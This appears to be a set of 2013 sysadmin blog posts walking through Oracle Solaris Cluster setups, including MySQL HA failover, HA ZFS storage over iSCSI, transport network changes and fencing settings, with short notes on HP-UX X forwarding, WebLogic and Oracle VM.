Server version: 5.5.30-ndb-7.2.12-cluster-commercial-advanced MySQL Cluster Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>

tadaaa.. <:-p <:-p
All that is left is to configure privileges & create a database with the ndbcluster engine.
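
For example (hypothetical database, table, and account names; note that grants stay local to each SQL node unless distributed privileges are enabled):

mysql> CREATE DATABASE kebon;
mysql> CREATE TABLE kebon.hewan (id INT NOT NULL PRIMARY KEY, nama VARCHAR(32)) ENGINE=NDBCLUSTER;
mysql> GRANT ALL ON kebon.* TO 'appuser'@'10.0.5.%' IDENTIFIED BY 'XXXX';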



Removing a Node From a Resource Group
How to remove a node (monyet3) from an active resource group..

# clq show d1   
=== Quorum Devices ===                         
 
Quorum Device Name:                             d1
  Enabled:                                         yes
  Votes:                                           2
  Global Name:                                     /dev/did/rdsk/d1s2
  Type:                                            shared_disk
  Access Mode:                                     scsi3
  Hosts (enabled):                                 monyet3, monyet1, monyet2
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      State
----------       ---------       ---------      -----
MySQL-RG         monyet1         No             Offline
                 monyet2         No             Online
                 monyet3         No             Offline
 
 
# clrs status
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            monyet1        Offline      Offline
                    monyet2        Online       Online - Service is online.
                    monyet3        Offline      Offline
 
MySQL-LH            monyet1        Offline      Offline - LogicalHostname offline.
                    monyet2        Online       Online - LogicalHostname online.
                    monyet3        Offline      Offline
 
MySQL-HAS           monyet1        Offline      Offline
                    monyet2        Online       Online
                    monyet3        Offline      Offline
 
 
#  scrgadm -pv -g MySQL-RG                   
Res Group name:                                    MySQL-RG
  (MySQL-RG) Res Group RG_description:             <NULL>
  (MySQL-RG) Res Group mode:                       Failover
  (MySQL-RG) Res Group management state:           Managed
  (MySQL-RG) Res Group RG_project_name:            default
  (MySQL-RG) Res Group RG_SLM_type:                manual
  (MySQL-RG) Res Group RG_affinities:              <NULL>
  (MySQL-RG) Res Group Auto_start_on_new_cluster:  True
  (MySQL-RG) Res Group Failback:                   False
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
  (MySQL-RG) Res Group Maximum_primaries:          1
  (MySQL-RG) Res Group Desired_primaries:          1
  (MySQL-RG) Res Group RG_dependencies:            <NULL>
  (MySQL-RG) Res Group network dependencies:       True
  (MySQL-RG) Res Group Global_resources_used:      <All>
  (MySQL-RG) Res Group Pingpong_interval:          3600
  (MySQL-RG) Res Group Pathprefix:                 <NULL>
  (MySQL-RG) Res Group system:                     False
  (MySQL-RG) Res Group Suspend_automatic_recovery: False
 
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2 monyet3
 
# scrgadm -c -g MySQL-RG -h monyet1,monyet2
#  scrgadm -pv -g MySQL-RG | grep -i nodelist
  (MySQL-RG) Res Group Nodelist:                   monyet1 monyet2
 
# scrgadm -pvv -g MySQL-RG | grep -i netiflist
    (MySQL-RG:MySQL-LH) Res property name:         NetIfList
      (MySQL-RG:MySQL-LH:NetIfList) Res property class: extension
      (MySQL-RG:MySQL-LH:NetIfList) Res property description: List of IPMP groups on each node
    (MySQL-RG:MySQL-LH:NetIfList) Res property pernode: False
      (MySQL-RG:MySQL-LH:NetIfList) Res property type: stringarray
      (MySQL-RG:MySQL-LH:NetIfList) Res property value: sc_ipmp0@1 sc_ipmp0@2 sc_ipmp0@3
 
# scrgadm -c -j MySQL-LH  -x netiflist=sc_ipmp0@1,sc_ipmp0@2

From the active node:

# clnode evacuate monyet3

Shut down monyet3 and boot it in non-cluster mode

ok boot -x

to be continued….



Monitoring MySQL Enterprise

  ozzie / 27/06/2013

MySQL HA – Solaris Cluster

  ozzie / 27/06/2013

Building MySQL Enterprise HA on the Solaris Clusters kandang-monyet & kandang-buaya…
Since the MySQL Data Service is not yet included in Solaris Cluster.. register it manually..

  *** Data Services Menu ***
    Please select from one of the following options:
 
      * 1) Apache Web Server
      * 2) Oracle
      * 3) NFS
      * 4) Oracle Real Application Clusters
      * 5) PeopleSoft Enterprise Application Server
      * 6) Highly Available Storage
      * 7) Logical Hostname
      * 8) Shared Address
      * 9) Per Node Logical Hostname
      *10) Weblogic Server
 
      * ?) Help
      * q) Return to the Main Menu
    Option:

register Generic Data Service

# clresourcetype register  SUNW.gds SUNW.HAStoragePlus
# clresourcetype  show
=== Registered Resource Types ===   
....
....
Resource Type:                                  SUNW.gds:6
  RT_description:                                  Generic Data Service for Oracle Solaris Cluster
  RT_version:                                      6
  API_version:                                     2
  RT_basedir:                                      /opt/SUNWscgds/bin
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         <NULL>
  RT_system:                                       False
  Global_zone:                                     False
 
Resource Type:                                  SUNW.HAStoragePlus:10
  RT_description:                                  HA Storage Plus
  RT_version:                                      10
  API_version:                                     2
  RT_basedir:                                      /usr/cluster/lib/rgm/rt/hastorageplus
  Single_instance:                                 False
  Proxy:                                           False
  Init_nodes:                                      All potential masters
  Installed_nodes:                                 <All>
  Failover:                                        False
  Pkglist:                                         SUNWscu
  RT_system:                                       False
  Global_zone:                                     True
.....

Create the resource group and logical hostname for failover

# clresourcegroup create MySQL-RG
# clresource create -g MySQL-RG -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p Zpools=zMysql -p ZpoolsSearchDir=/dev/did/dsk MySQL-HAS
# clreslogicalhostname create -g MySQL-RG -h buaya  MySQL-LH 
# clresource list -v
Resource Name       Resource Type            Resource Group
-------------       -------------            --------------
MySQL-LH            SUNW.LogicalHostname:4   MySQL-RG
MySQL-HAS           SUNW.HAStoragePlus:10    MySQL-RG

Manual registration:
set the parameters to match the configuration & register…

# cp /opt/SUNWscmys/util/mysql_config /export/home/ozzie/mysql_config
# cp /opt/SUNWscmys/util/ha_mysql_config /export/home/ozzie/ha_mysql_config

mysql_config:

MYSQL_BASE=/opt/mysql/mysql
MYSQL_USER=root
MYSQL_PASSWD=baueek
MYSQL_HOST=Buaya
FMUSER=fmuser
FMPASS=fmuser
MYSQL_SOCK=/tmp/mysql.sock
MYSQL_NIC_HOSTNAME=Buaya
MYSQL_DATADIR=/global/mysql

ha_mysql_config:

 
RS=MySQL-RS
RG=MySQL-RG
PORT=3306
LH=buaya
SCALABLE=
LB_POLICY=
RS_PROP=
HAS_RS=MySQL-HAS
 
BASEDIR=/opt/mysql/mysql
DATADIR=/global/mysql
MYSQLUSER=mysql
MYSQLHOST=buaya
FMUSER=fmuser
FMPASS=fmuser
LOGDIR=/global/mysql/logs
CHECK=yes

register Data Service:

# /opt/SUNWscmys/util/mysql_register -f /export/home/ozzie/mysql_config  
# /opt/SUNWscmys/util/ha_mysql_register -f /export/home/ozzie/ha_mysql_config  
# clrs enable MySQL-RS

Taddaaaaa <:-p

bash-3.2# clrs status
 
=== Cluster Resources ===
 
Resource Name       Node Name      State        Status Message
-------------       ---------      -----        --------------
MySQL-RS            buaya2         Online       Online - Service is online.
                    buaya1         Offline      Offline
 
MySQL-LH            buaya2         Online       Online - LogicalHostname online.
                    buaya1         Offline      Offline
 
MySQL-HAS           buaya2         Online       Online
                    buaya1         Offline      Offline

Now just switch between the nodes #:-s

# mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 84
Server version: 5.6.12-enterprise-commercial-advanced-log MySQL Enterprise Server - Advanced Edition (Commercial)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>



Shut down all nodes.

root@Monyet3:~# scshutdown 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:42:38...
 The cluster kandang-monyet will be shutdown in  1 minute
 
Broadcast Message from root (???) on Monyet3 Mon Jun 24 02:43:08...
 The cluster kandang-monyet will be shutdown in  30 seconds
 
Do you want to continue? (y or n):   y

Since these are SPARC machines, just add the option at the OK prompt..

SPARC Enterprise T5220, No Keyboard
Copyright (c) 1998, 2012, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.33.6.b, 4096 MB memory available, Serial #83382360.
Ethernet address 0:14:4f:f8:50:58, Host ID: 84f85058.
 
 
 
{0} ok boot -x
Boot device: /virtual-devices@100/channel-devices@200/disk@0:a  File and args: -x
SunOS Release 5.11 Version 11.1 64-bit
Copyright (c) 1983, 2012, Oracle and/or its affiliates. All rights reserved.
\

Then just execute clsetup

  *** Main Menu ***
 
    Select from one of the following options:
 
        1) Change Network Addressing and Ranges for the Cluster Transport
        2) Show Network Addressing and Ranges for the Cluster Transport
 
        ?) Help with menu options
        q) Quit
 
    Option:

  >>> Change Network Addressing and Ranges for the Cluster Transport <<<
 
    Network addressing for the cluster transport is currently configured 
    as follows:
 
 
=== Private Network ===                        
 
private_netaddr:                                172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
 
    Do you want to change this configuration (yes/no) [yes]?  
 
    The default network address for the cluster transport is 172.16.0.0.
 
    Do you want to use the default (yes/no) [yes]?  no
 
    What network address do you want to use?  172.16.202.0
 
    The combination of private netmask and network address will dictate 
    both the maximum number of nodes and private networks that can be 
    supported by a cluster. Given your private network address, this 
    program will generate a range of recommended private netmasks based on
    the maximum number of nodes and private networks that you anticipate 
    for this cluster.
 
    In specifying the anticipated number of maximum nodes and private 
    networks for this cluster, it is important that you give serious 
    consideration to future growth potential. While both the private 
    netmask and network address can be changed later, the tools for making
    such changes require that all nodes in the cluster be booted into 
    noncluster mode.
 
    Maximum number of nodes anticipated for future growth [3]?  
    Maximum number of private networks anticipated for future growth [2]?  
 
    Specify a netmask of 255.255.254.0 to meet anticipated future 
    requirements of 3 cluster nodes and 2 private networks.
 
    To accommodate more growth, specify a netmask of 255.255.254.0 to 
    support up to 6 cluster nodes and 4 private networks.
 
    What netmask do you want to use [255.255.254.0]?  
 
    Is it okay to proceed with the update (yes/no) [yes]?  
 
/usr/cluster/bin/cluster set-netprops -p private_netaddr=172.16.202.0 -p private_netmask=255.255.254.0 -p max_nodes=3 -p max_privatenets=2
Attempting to contact node "Monyet3" ...done
Attempting to contact node "Monyet2" ...done
 
    Command completed successfully.

Just reboot and taadddaaaaa.. 8-}

root@Monyet1:~# clinterconnect show
 
=== Transport Cables ===                       
 
Transport Cable:                                Monyet3:net0,switch1@1
  Endpoint1:                                       Monyet3:net0
  Endpoint2:                                       switch1@1
  State:                                           Enabled
 
Transport Cable:                                Monyet3:net2,switch2@1
  Endpoint1:                                       Monyet3:net2
  Endpoint2:                                       switch2@1
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net0,switch1@2
  Endpoint1:                                       Monyet2:net0
  Endpoint2:                                       switch1@2
  State:                                           Enabled
 
Transport Cable:                                Monyet2:net2,switch2@2
  Endpoint1:                                       Monyet2:net2
  Endpoint2:                                       switch2@2
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net0,switch1@3
  Endpoint1:                                       Monyet1:net0
  Endpoint2:                                       switch1@3
  State:                                           Enabled
 
Transport Cable:                                Monyet1:net2,switch2@3
  Endpoint1:                                       Monyet1:net2
  Endpoint2:                                       switch2@3
  State:                                           Enabled
 
 
=== Transport Switches ===                     
 
Transport Switch:                               switch1
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
Transport Switch:                               switch2
  State:                                           Enabled
  Type:                                            switch
  Port Names:                                      1 2 3
  Port State(1):                                   Enabled
  Port State(2):                                   Enabled
  Port State(3):                                   Enabled
 
 
--- Transport Adapters for Monyet3 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.17
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.9
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet2 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.18
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.10
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
 
--- Transport Adapters for Monyet1 ---         
 
Transport Adapter:                              net0
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 0
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.19
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled
 
Transport Adapter:                              net2
  State:                                           Enabled
  Transport Type:                                  dlpi
  device_name:                                     net
  device_instance:                                 2
  lazy_free:                                       1
  dlpi_heartbeat_timeout:                          10000
  dlpi_heartbeat_quantum:                          1000
  nw_bandwidth:                                    80
  bandwidth:                                       70
  ip_address:                                      172.16.202.11
  netmask:                                         255.255.255.248
  Port Names:                                      0
  Port State(0):                                   Enabled


HA storage ZFS

  ozzie / 23/06/2013

A simulation of high-availability storage with a 3-node Solaris Cluster and iSCSI, on Solaris 11 & Solaris Cluster 4.1.


Once the Solaris Cluster is up..

root@Monyet1:~# cluster show -t global
=== Cluster ===                                
Cluster Name:                                   kandang-monyet
  clusterid:                                       0x51C6CA70
  installmode:                                     disabled
  heartbeat_timeout:                               10000
  heartbeat_quantum:                               1000
  private_netaddr:                                 172.16.0.0
  private_netmask:                                 255.255.240.0
  max_nodes:                                       62
  max_privatenets:                                 10
  num_zoneclusters:                                12
  num_xip_zoneclusters:                            3
  udp_session_timeout:                             480
  concentrate_load:                                False
  resource_security:                               SECURE
  global_fencing:                                  prefer3
  Node List:                                       Monyet3, Monyet2, Monyet1
 
root@Monyet1:~# clnode status
=== Cluster Nodes ===
--- Node Status ---
 
Node Name                                       Status
---------                                       ------
Monyet3                                         Online
Monyet2                                         Online
Monyet1                                         Online

Add quorum disk device

root@Monyet1:~# cldevice status
=== Cluster DID Devices ===
Device Instance              Node               Status
---------------              ----               ------
/dev/did/rdsk/d1             Monyet3            Unmonitored
 
/dev/did/rdsk/d2             Monyet1            Ok
                             Monyet2            Ok
                             Monyet3            Ok
 
/dev/did/rdsk/d3             Monyet2            Unmonitored
 
/dev/did/rdsk/d5             Monyet1            Unmonitored

Enable automatic node reboot if all monitored disk paths fail:

root@Monyet1:~# clnode set -p reboot_on_path_failure=enabled +
 
root@Monyet1:~# clnode show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Monyet3
  Node ID:                                         1
  Enabled:                                         yes
  privatehostname:                                 clusternode1-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000001
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet2
  Node ID:                                         2
  Enabled:                                         yes
  privatehostname:                                 clusternode2-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000002
  Transport Adapter List:                          net0, net2
 
Node Name:                                      Monyet1
  Node ID:                                         3
  Enabled:                                         yes
  privatehostname:                                 clusternode3-priv
  reboot_on_path_failure:                          enabled
  globalzoneshares:                                1
  defaultpsetmin:                                  1
  quorum_vote:                                     1
  quorum_defaultvote:                              1
  quorum_resv_key:                                 0x51C6CA7000000003
  Transport Adapter List:                          net0, net2

Registering the cluster storage & network resource types

root@Monyet1:~# clresourcetype register SUNW.gds SUNW.HAStoragePlus



Create a resource group across the Monyet nodes

root@Monyet1:~# clresourcegroup create -n Monyet1,Monyet2,Monyet3 RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Unmanaged
                 Monyet2         No             Unmanaged
                 Monyet3         No             Unmanaged
 
root@Monyet1:~# clresourcegroup manage RG-MONYET
root@Monyet1:~# clresourcegroup status
 
=== Cluster Resource Groups ===
 
Group Name       Node Name       Suspended      Status
----------       ---------       ---------      ------
RG-MONYET        Monyet1         No             Offline
                 Monyet2         No             Offline
                 Monyet3         No             Offline



Create the ZFS pool for the movie collection – 'poolBOKEP' – before adding it to the cluster resources

root@Monyet1:~# echo | format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
       0. c2d0 <SUN-Disk-40GB cyl 1135 alt 2 hd 96 sec 768>
          /virtual-devices@100/channel-devices@200/disk@0
       1. c3t0d0 <iSCSI Disk-0123 cyl 19455 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2013-03.org.kebonbinatang.storage1%3Adisk00001,0
Specify disk (enter its number): Specify disk (enter its number): 
 
root@Monyet1:~# zpool  create poolBOKEP c3t0d0
root@Monyet1:~# zpool export poolBOKEP



Add 'poolBOKEP' to the resource group RG-MONYET:

root@Monyet1:~# clresource create -g RG-MONYET -t SUNW.HAStoragePlus -p AffinityOn=TRUE -p Zpools=poolBOKEP -p ZpoolsSearchDir=/dev/did/dsk RS-BOKEP-HAS
root@Monyet1:~# clresource list
RS-BOKEP-HAS
root@Monyet1:~# clresource show
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

Import poolBOKEP:

root@Monyet1:~#  zpool import poolBOKEP

Add a virtual IP resource to the resource group RG-MONYET:

root@Monyet1:~# clreslogicalhostname create -g RG-MONYET -h Monyet -N  \
sc_ipmp0@Monyet1,sc_ipmp0@Monyet2,sc_ipmp0@Monyet3 RS-MONYET
 
root@Monyet1:~# clresource list
RS-MONYET
RS-BOKEP-HAS
root@Monyet1:~# clresource show
 
=== Resources ===                              
 
Resource:                                       RS-BOKEP-HAS
  Type:                                            SUNW.HAStoragePlus:10
  Type_version:                                    10
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True
 
Resource:                                       RS-MONYET
  Type:                                            SUNW.LogicalHostname:4
  Type_version:                                    4
  Group:                                           RG-MONYET
  R_description:                                   
  Resource_project_name:                           default
  Enabled{Monyet1}:                                True
  Enabled{Monyet2}:                                True
  Enabled{Monyet3}:                                True
  Monitored{Monyet1}:                              True
  Monitored{Monyet2}:                              True
  Monitored{Monyet3}:                              True

From here you can just move the resource group around between the other Monyet nodes ;)) [failover]

root@Monyet1:~# clresourcegroup switch -n Monyet3 RG-MONYET

or put it back on its preferred node :-??

root@Monyet1:~#  clresourcegroup remaster RG-MONYET
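
Either way, a status check shows which Monyet currently owns the group (hedged example):

root@Monyet1:~# clresourcegroup status RG-MONYET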

Now just fill poolBOKEP with movies \:d/

root@Monyet3:~# scstat 
------------------------------------------------------------------
 
-- Cluster Nodes --
 
                    Node name           Status
                    ---------           ------
  Cluster node:     Monyet3             Online
  Cluster node:     Monyet2             Online
  Cluster node:     Monyet1             Online
 
------------------------------------------------------------------
 
-- Cluster Transport Paths --
 
                    Endpoint               Endpoint               Status
                    --------               --------               ------
  Transport path:   Monyet3:net2           Monyet2:net2           Path online
  Transport path:   Monyet3:net0           Monyet2:net0           Path online
  Transport path:   Monyet3:net2           Monyet1:net2           Path online
  Transport path:   Monyet3:net0           Monyet1:net0           Path online
  Transport path:   Monyet2:net2           Monyet1:net2           Path online
  Transport path:   Monyet2:net0           Monyet1:net0           Path online
 
------------------------------------------------------------------
 
-- Quorum Summary from latest node reconfiguration --
 
  Quorum votes possible:      5
  Quorum votes needed:        3
  Quorum votes present:       5
 
 
-- Quorum Votes by Node (current status) --
 
                    Node Name           Present Possible Status
                    ---------           ------- -------- ------
  Node votes:       Monyet3             1        1       Online
  Node votes:       Monyet2             1        1       Online
  Node votes:       Monyet1             1        1       Online
 
 
-- Quorum Votes by Device (current status) --
 
                    Device Name         Present Possible Status
                    -----------         ------- -------- ------
  Device votes:     /dev/did/rdsk/d2s2  2        2       Online
 
------------------------------------------------------------------
 
-- Device Group Servers --
 
                         Device Group        Primary             Secondary
                         ------------        -------             ---------
 
 
-- Device Group Status --
 
                              Device Group        Status              
                              ------------        ------              
 
 
-- Multi-owner Device Groups --
 
                              Device Group        Online Status
                              ------------        -------------
 
------------------------------------------------------------------
 
-- Resource Groups and Resources --
 
            Group Name     Resources
            ----------     ---------
 Resources: RG-MONYET      RS-BOKEP-HAS RS-MONYET
 
 
-- Resource Groups --
 
            Group Name     Node Name                State          Suspended
            ----------     ---------                -----          ---------
     Group: RG-MONYET      Monyet1                  Offline        No
     Group: RG-MONYET      Monyet2                  Online         No
     Group: RG-MONYET      Monyet3                  Offline        No
 
 
-- Resources --
 
            Resource Name  Node Name                State          Status Message
            -------------  ---------                -----          --------------
  Resource: RS-BOKEP-HAS   Monyet1                  Offline        Offline
  Resource: RS-BOKEP-HAS   Monyet2                  Online         Online
  Resource: RS-BOKEP-HAS   Monyet3                  Offline        Offline
 
  Resource: RS-MONYET      Monyet1                  Offline        Offline - LogicalHostname offline.
  Resource: RS-MONYET      Monyet2                  Online         Online - LogicalHostname online.
  Resource: RS-MONYET      Monyet3                  Offline        Offline
 
------------------------------------------------------------------
 
-- IPMP Groups --
 
              Node Name           Group   Status         Adapter   Status
              ---------           -----   ------         -------   ------
  IPMP Group: Monyet3             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet2             sc_ipmp0 Online         net1      Online
 
  IPMP Group: Monyet1             sc_ipmp0 Online         net1      Online
 
------------------------------------------------------------------


Disable fencing for shared-storage device

  ozzie / 23/06/2013

Since iSCSI is used as the shared storage for all the Buaya nodes ;))

# echo | format
Searching for disks...done
 
AVAILABLE DISK SELECTIONS:
       0. c1t0d0 <HITACHI-H103014SCSUN146G-A160-136.73GB>
          /pci@0/pci@0/pci@2/scsi@0/sd@0,0
       1. c2t2d0 <iSCSIDisk-0123 cyl 6524 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2011-03.org.kebonbinatang.storage2%3Adisk20001,0
       2. c2t3d0 <iSCSIDisk-0123 cyl 6524 alt 2 hd 255 sec 63>
          /iscsi/disk@0000iqn.2011-03.org.kebonbinatang.storage2%3Adisk20001,1
Specify disk (enter its number): Specify disk (enter its number):

# clq show
 
=== Cluster Nodes ===                          
 
Node Name:                                      Buaya1
  Node ID:                                         1
  Quorum Vote Count:                               1
  Reservation Key:                                 0x51C625D900000001
 
Node Name:                                      Buaya2
  Node ID:                                         2
  Quorum Vote Count:                               1
  Reservation Key:                                 0x51C625D900000002
 
 
=== Quorum Devices ===                         
 
Quorum Device Name:                             d2
  Enabled:                                         yes
  Votes:                                           1
  Global Name:                                     /dev/did/rdsk/d2s2
  Type:                                            shared_disk
  Access Mode:                                     scsi2
  Hosts (enabled):                                 Buaya1, Buaya2

# cldevice show
 
=== DID Device Instances ===                   
 
DID Device Name:                                /dev/did/rdsk/d1
  Full Device Path:                                Buaya2:/dev/rdsk/c2t3d0
  Full Device Path:                                Buaya1:/dev/rdsk/c2t3d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d2
  Full Device Path:                                Buaya1:/dev/rdsk/c2t2d0
  Full Device Path:                                Buaya2:/dev/rdsk/c2t2d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d3
  Full Device Path:                                Buaya1:/dev/rdsk/c1t0d0
  Replication:                                     none
  default_fencing:                                 global
 
DID Device Name:                                /dev/did/rdsk/d4
  Full Device Path:                                Buaya2:/dev/rdsk/c1t0d0
  Replication:                                     none
  default_fencing:                                 global



Disable fencing on the shared device d2 from earlier:

# cldevice set  -p default_fencing=nofencing-noscrub d2
#
# cldevice show       
 
=== DID Device Instances ===                   
.....
.....
DID Device Name:                                /dev/did/rdsk/d2
  Full Device Path:                                Buaya1:/dev/rdsk/c2t2d0
  Full Device Path:                                Buaya2:/dev/rdsk/c2t2d0
  Replication:                                     none
  default_fencing:                                 nofencing
 
.....
.....
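
If you would rather flip the default for the whole cluster instead of per DID device, Solaris Cluster also has a global fencing property (hedged; double-check against your cluster release first):

# cluster set -p global_fencing=nofencing-noscrub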


ssh X-Forward – HPUX

  ozzie / 16/06/2013

just reminder :D

The ssh X-Forwarding configuration on the HP-UX box is already correct.. but these errors still show up:
Error: Can’t open display:
Error: Couldn’t find per display information

meanwhile, suppose you need to run an application that requires a GUI.. #:-s

 

# echo "hosts: files dns" > /etc/nsswitch.conf
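
Then reconnect with X forwarding and check that a DISPLAY actually gets set (hedged example; the hostname is just a placeholder):

$ ssh -X root@hpux-box
# echo $DISPLAY                 <--- should now print something like localhost:10.0
# xclock &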

Trivial, really… 8-} but better than panicking? =))



Pre-Requisites:

  • Oracle Database 11g
  • Oracle Business Intelligence
  • Repository Creation Utility (RCU) tools
  • nls_length_semantics parameter on the database must be set to BYTE (CHAR is not supported; see the quick check below)
  • database character set: UTF-8
  • enable X Forwarding via SSH
    edit /etc/ssh/sshd_config

    # X11 tunneling options
    X11Forwarding yes
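
    For the nls_length_semantics item above, a hedged sqlplus sketch to check and, if needed, set it (assumes you can connect as a DBA):

    SQL> show parameter nls_length_semantics
    SQL> alter system set nls_length_semantics='BYTE' scope=both;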


    default Oracle Business Intelligence URLs:

    Component                          Default URL                    Port
    ---------                          -----------                    ----
    Oracle BI Presentation Services    http://host:9704/analytics     9704
    WebLogic Console                   http://host:7001/console       7001
    Enterprise Manager                 http://host:7001/em            7001
    Business Intelligence Publisher    http://host:9704/xmlpserver    9704
    Real-Time Decisions                http://host:9704/ui            9704

    to be continued..



Installing Oracle VM Manager

  ozzie / 23/05/2013

Oracle VM Manager with Oracle Linux 6.x as the base OS. Install the OS as usual..

Minimum prerequisite specs for OVM (a quick check follows the list):

  • Memory: 1.5 GB (4 GB if using Oracle Database XE)
  • Processor: 64-bit
  • Swap: > 2.1 GB
  • Disk Space: 5 GB for /u01 and 2 GB for /tmp
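
On the freshly installed Oracle Linux box these can be checked with the usual tools (a hedged sketch, assuming /u01 already exists):

# free -m                   <--- memory
# swapon -s                 <--- swap
# df -h /u01 /tmp           <--- disk space
# uname -m                  <--- should report x86_64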

 

All sources can be downloaded from: https://edelivery.oracle.com/
To update Oracle Linux packages via yum (see here)

Here is the list of ports required for OVM – OVS – client communication:



Oracle Enterprise Cloud Infrastructure

  ozzie / 23/04/2013

Exploring & building Cloud & Solaris Virtualization (LDoms & Zones).



Just a review: Oracle Enterprise Manager Ops Center. All the features: monitoring, provisioning, managing, maintaining.. even development, with deployment plans included… migrating zones & VMs.. server & storage pools..


Enterprise Manager Ops Center 12c & Enterprise Manager Cloud Control 12c



Oracle WebLogic

  ozzie / 21/04/2013

*Just Reminder
Sometimes the install is done through the GUI and the domain is configured via quickstart.sh #:-s

For non-GUI SOLARIS machines:

# {WLS_HOME}/common/bin/config.sh -mode=console

Oh yeah #-o..
for Solaris 11 you have to install the JDK first (javac is not there by default)

#  pkg  install --accept pkg:/developer/java/jdk@1.7.0.7-0.175.1.0.0.24.0
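
Afterwards, a quick check that the compiler is really there (hedged):

# which javac
# javac -version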


splack [slackware @ SPARC]

  ozzie / 10/04/2013

install splack @ SPARC Architecture:

Since it runs inside a Solaris LDom, just allocate whatever resources it needs :D (a rough sketch below)
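
A rough sketch of carving the guest domain out of the control domain (the domain name 'splack', the sizes, and the disk backend are placeholders, and it assumes the primary-vsw0 / primary-vds0 services already exist):

# ldm add-domain splack
# ldm set-vcpu 8 splack
# ldm set-memory 4G splack
# ldm add-vnet vnet0 primary-vsw0 splack
# ldm add-vdsdev /dev/zvol/dsk/rpool/splack-disk0 splack-disk0@primary-vds0
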